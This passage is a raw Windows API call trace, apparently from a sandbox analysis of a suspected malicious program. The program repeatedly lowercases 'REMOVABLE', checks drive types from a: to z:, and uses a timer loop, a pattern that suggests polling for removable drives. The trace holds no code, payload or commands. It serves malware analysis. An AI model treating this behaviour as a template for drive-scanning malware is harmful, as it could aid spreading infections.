Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.766] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.766] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.767] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.767] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.767] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.767] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.768] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.768] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.768] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.768] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.769] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.769] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.769] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.769] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.769] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.770] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.770] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.770] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.771] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.771] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.771] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.771] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.771] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.772] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.772] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.772] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.772] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0221.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0221.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.773] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0221.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0221.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0221.774] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0221.774] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0221.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.774] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.775] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0221.775] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0221.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0221.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0221.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.776] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.776] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.776] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.776] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.776] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.776] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.776] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.777] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.777] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.777] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.777] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.777] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.778] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.778] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.778] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.779] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.779] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.779] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.779] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.779] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.780] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.780] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.780] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.780] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.780] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.781] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.781] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0221.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0221.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.781] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0221.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0221.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0221.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0221.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0221.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0221.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0221.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0221.783] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.783] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.783] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0221.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0221.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0221.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0221.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0221.784] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.784] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.784] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.784] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.784] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.784] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.785] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.785] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.785] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.785] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.786] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.786] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.786] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.786] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.786] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.787] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.787] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.787] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.787] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.787] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.787] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.788] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.788] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.788] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.788] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.788] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.788] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.789] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0221.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0221.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0221.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.789] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0221.789] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0221.789] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0221.789] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0221.790] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0221.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0221.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0221.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0221.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0221.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0221.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0221.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.791] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0221.791] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0221.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0221.791] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0221.791] HeapFree (in: 